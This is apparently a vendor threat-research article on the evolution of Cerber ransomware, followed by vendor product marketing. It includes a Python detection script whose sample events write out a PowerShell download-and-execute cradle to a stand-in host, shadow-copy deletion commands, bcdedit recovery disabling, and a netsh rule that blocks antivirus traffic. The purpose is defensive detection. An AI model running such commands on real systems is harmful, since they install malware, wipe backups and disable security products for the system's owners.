Figure 1: Top countries affected by Cerber, with the U.S. the most heavily impacted

We've also seen how the latest versions of Cerber employ a number of methods to avoid traditional security solutions. Since its emergence in 2016, Cerber's evolution has shown how its developers constantly diversified the ransomware's attack chain while broadening its capabilities to stay ahead of the game. Here is a summary of Cerber's evolution so far:
| | Cerber v1, v2 and v3 | Cerber v4 | Cerber v5 | Cerber SFX | Cerber v6 |
|---|---|---|---|---|---|
| File type | EXE | EXE | EXE | SFX (loader), VBS, DLL | EXE |
| Exceptions (Cerber doesn't execute if it detects certain components on the system) | Language (v1 and v3)*; language and antivirus (AV) (v2)* | Language* | Language* | AV, VM and sandbox (loader*); language* | Language* |
| Anti-AV routine | None | None | None | None | EXE files of AV, firewall and antispyware products blocked by Windows Firewall rules* |
| Anti-sandbox | None | None | None | VM and sandbox (loader*) | VM and sandbox (loader*) |
| Backup deletion | Yes (vssadmin, WMIC, BCDEdit)* | Yes (WMIC)* | Yes (WMIC)*; removed in v5.02 | Varies (some samples delete backups) | Varies (some samples delete backups) |
| Exclusion list (directories and file types Cerber doesn't encrypt) | Folder and file* | Folder and file* | Folder and file*; AV, antispyware and firewall directories | Folder and file*; AV, antispyware and firewall directories | Folder and file* |
Figure 3: Infection chain of Cerber Version 6

Adding a time delay to the attack chain lets Cerber elude traditional sandboxes, particularly those with time-out mechanisms or those that wait for the malware's final execution before returning a verdict. Other JS files we saw ran powershell.exe (called by wscript.exe) with a PowerShell script as its parameter; that script is the one responsible for downloading the ransomware and executing it on the system.

Early on, Cerber was distributed as a Windows Script File (.WSF) containing obfuscated JScript that carried the ransomware. Along with seemingly legitimate email content, this was one of the early techniques Cerber used to evade spam filters and heuristic analysis. Barely a week after, Cerber was updated with the capability to integrate the infected system into botnets, which were employed to conduct distributed denial-of-service (DDoS) attacks. By July, a spam campaign was seen abusing the cloud-based productivity platform Office 365 through Office documents embedded with a malicious macro that downloads and helps execute the ransomware.

Exploit kits are also a key element in Cerber's distribution. Cerber-related malvertising campaigns observed in 2016 diverted users to the Magnitude, Rig and Neutrino (which has since gone private) exploit kits, which target system or software vulnerabilities. This year, the relatively new Sundown exploit kit has joined the fray.

More Cautious, Defensive

Cerber 6 has features that stand out. For one, it no longer has a routine for terminating processes, which we saw in earlier versions such as Cerber 4, which terminated database-related processes so that their files could be encrypted (a database file held open by its server process is otherwise locked against writes). This routine can be construed as superfluous, since Cerber, along with its strong encryption capability, already hits a broad base of targets and file types to start with. Cerber 6 also added another check on file extensions it's not supposed to encrypt.
This harks back to how we saw Cerber exhibiting behaviors that foreshadowed its shift to stealth-focused techniques. In February this year, certain variants (RANSOM_CERBER.F117AK) started checking whether the affected system had any firewall, antivirus, or antispyware products installed, and made sure that their associated files weren't encrypted. Cerber 6 goes beyond identifying them: it can be configured to add Windows Firewall rules that block the outbound traffic of every executable binary of the firewall, antivirus, and antispyware products installed on the system. This can restrict those products' detection and mitigation capabilities, since cloud look-ups and signature or engine updates all depend on an outbound connection. On top of this, Cerber can circumvent static machine learning detection, and its awareness of analysis tools and virtualized environments lets it evade them by self-destructing when it finds them.
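The behaviors summarized in the table and described in the two paragraphs above (a script host launching a PowerShell downloader, shadow-copy and BCDEdit tampering, and a firewall rule that blocks a security product's executable) translate directly into endpoint detection rules. The script below is an added example, not Cerber code and not Trend Micro's detection logic: it runs those rules over constructed Sysmon-style process-creation events. The events, the product directory C:\Program Files\ExampleAV and the use of netsh to create the firewall rule are assumptions for illustration; a rule added through the Windows Firewall COM API leaves no command line to match, so rule 3 should be backed by auditing firewall rule changes themselves.

```python
"""Detection rules for the Cerber 6 behaviors described above, evaluated over
constructed Sysmon-style process-creation events (added example; not Cerber
code and not Trend Micro's detection logic)."""
import json
import re
from typing import Dict, Iterable, List

# Constructed sample telemetry. Field names follow Sysmon Event ID 1
# (ProcessCreate); the paths, rule names and product directory are made up.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Benign: a user editing a text file.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" notes.txt'},
    # Stage 1: the script host spawned by a JS/WSF lure runs a PowerShell
    # download-and-execute one-liner.
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/p.exe','C:\\Users\\Public\\a.exe');"
                    " Start-Process 'C:\\Users\\Public\\a.exe'\""},
    # Backup deletion with the three tools named in the table.
    {"ParentImage": r"C:\Users\Public\a.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"ParentImage": r"C:\Users\Public\a.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"ParentImage": r"C:\Users\Public\a.exe",
     "Image": r"C:\Windows\System32\bcdedit.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    # Outbound block rule aimed at a security product's executable
    # (assumption: created with netsh; a rule added through the firewall COM
    # API would leave no command line to match).
    {"ParentImage": r"C:\Users\Public\a.exe",
     "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="upd" dir=out '
                    'action=block program="C:\\Program Files\\ExampleAV\\avservice.exe"'},
    # Benign admin use of netsh: an inbound allow rule, not an outbound block.
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall add rule name="app" dir=in '
                    'action=allow program="C:\\Tools\\app.exe"'},
]

# Assumed install directories of the security products on the host. In
# practice, build this list from the same source Cerber reads: the WMI
# SecurityCenter2 AntiVirusProduct/FirewallProduct/AntiSpywareProduct classes.
SECURITY_PRODUCT_DIRS = [r"C:\Program Files\ExampleAV"]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
# Image name -> (command-line pattern, finding name) for backup/recovery tampering.
BACKUP_TAMPER = {
    "vssadmin.exe": (re.compile(r"\bdelete\s+shadows\b", re.I), "vssadmin shadow copy deletion"),
    "wmic.exe": (re.compile(r"\bshadowcopy\s+delete\b", re.I), "WMIC shadow copy deletion"),
    "bcdedit.exe": (re.compile(r"\brecoveryenabled\s+no\b", re.I), "BCDEdit disables Windows recovery"),
}
FW_PROGRAM = re.compile(r'program=(?:"([^"]*)"|(\S+))', re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def under_security_dir(program: str) -> bool:
    """True if the program path lies inside one of the security product directories."""
    p = program.lower()
    return any(p.startswith(d.lower().rstrip("\\") + "\\") for d in SECURITY_PRODUCT_DIRS)


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event matches (empty list = nothing found)."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    hits: List[str] = []
    # Rule 1: script host -> PowerShell with a download cradle (the JS/WSF stage).
    if parent in SCRIPT_HOSTS and image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
        hits.append("script-host PowerShell download cradle")
    # Rule 2: shadow copy deletion or Windows recovery disabled.
    if image in BACKUP_TAMPER and BACKUP_TAMPER[image][0].search(cmd):
        hits.append(BACKUP_TAMPER[image][1])
    # Rule 3: outbound block rule whose program lives in a security product directory.
    low = cmd.lower()
    if image == "netsh.exe" and "advfirewall firewall add rule" in low \
            and "dir=out" in low and "action=block" in low:
        m = FW_PROGRAM.search(cmd)
        if m and under_security_dir(m.group(1) or m.group(2)):
            hits.append("firewall rule blocks security product outbound traffic")
    return hits


def scan(events: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each matching command line to its findings; events with no hits are dropped."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            findings[ev["CommandLine"]] = hits
    return findings


if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_EVENTS), indent=2))
```

Running the script reports five findings out of the seven constructed events; the notepad launch and the inbound allow rule produce none. Rule 1 is the highest-value one in practice because it fires before the payload lands, while rules 2 and 3 fire only once the ransomware is already executing.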
Figure 5: Cerber 6 uses Windows Management Instrumentation (WMI) to check for security products installed on the system

Locky constantly changed the email file attachments in its spam campaigns, expanding its arrival vectors beyond JS files and PowerShell scripts (from JScript to HTML Application (.HTA) and compressed binary (.BIN) files) and exploiting file types that aren't usually used to deliver malware. In fact, we're currently seeing .HTA files leveraged by a campaign that uses Cerber as its payload. Our initial analysis indicates that the campaign, which we began monitoring in the third week of April, appears to target Europe; we also found the same campaign attacking two Latin American countries. This campaign is notable for displaying Cerber's ransom note in the local language of the infected system: it uses an .HTA file both to detect the local language and to show the online message/ransom note in it.

Cerber is also being incorporated as a secondary payload. Exploits for a recently patched remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638) reportedly emerged to infect Windows servers with Cerber.

Indeed, Cerber's evolution reflects the need for organizations and end users to be aware of today's constantly evolving threats. End users risk losing money and their important personal files to ransomware; it also threatens organizations' business operations, reputation, and bottom line. While there is no silver bullet against ransomware, keeping systems up to date, treating unsolicited and suspicious emails with caution, regularly backing up important files (and keeping those backups offline, out of reach of the shadow-copy deletion described above), and cultivating a culture of cybersecurity in the workplace are some of the best practices for defending against it.
IT/system administrators and information security professionals can further defend their organization's perimeter by incorporating additional layers of security against suspicious files, processes, applications, and network activity that can be exploited and leveraged by ransomware. Users and businesses can also benefit from a multilayered approach to security that covers the gateway, endpoints, networks, and servers.

Trend Micro Ransomware Solutions: Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs. Trend Micro™ Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs. Trend Micro OfficeScan™ with XGen™ endpoint security infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against ransomware and advanced malware. Our machine learning capabilities are tuned to account for attacks using techniques employed by ransomware like Cerber.
Endpoint Protection: Trend Micro Smart Protection Suites detects and stops suspicious behavior and exploits associated with ransomware at the endpoint level. Capabilities: Ransomware Behavior Monitoring, Application Control, Vulnerability Shielding, Web Security.

Network Protection: Trend Micro Deep Discovery Inspector detects malicious traffic, communications, and other activities associated with attempts to inject ransomware into the network. Capabilities: Network Traffic Scanning, Malware Sandbox, Lateral Movement Prevention.

Server Protection: Trend Micro Deep Security™ detects and stops suspicious network activity and shields servers and applications from exploits. Capabilities: Webserver Protection, Vulnerability Shielding, Lateral Movement Prevention.
PROTECTION FOR SMALL-MEDIUM BUSINESSES AND HOME USERS
Protection for Small-Medium Businesses: Trend Micro Worry-Free™ Business Security Advanced offers cloud-based email gateway security through Hosted Email Security that can detect and block ransomware. Capabilities: Ransomware Behavior Monitoring, IP/Web Reputation.

Protection for Home Users: Trend Micro Security 10 provides robust protection against ransomware by blocking malicious websites, emails, and files associated with this threat. Capabilities: IP/Web Reputation, Ransomware Protection.